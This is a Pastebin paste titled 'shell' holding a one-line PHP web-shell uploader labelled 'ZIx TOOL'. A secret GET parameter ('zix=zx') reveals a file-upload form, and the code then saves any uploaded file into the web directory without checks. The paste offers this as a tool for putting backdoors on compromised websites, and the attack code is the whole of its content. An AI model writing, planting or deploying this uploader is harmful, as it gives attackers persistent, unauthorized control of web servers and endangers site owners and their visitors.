Advertisement
Achraf9090

shell

Sep 25th, 2022
738
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.29 KB | None | 0 0
  1. <?php  $system = $_GET['zix']; if($system == 'zx'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file'name='file' /><input type='submit' value='file' /></form>"; move_uploaded_file($saw1,$saw2);} ?>ZIx TOOL
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement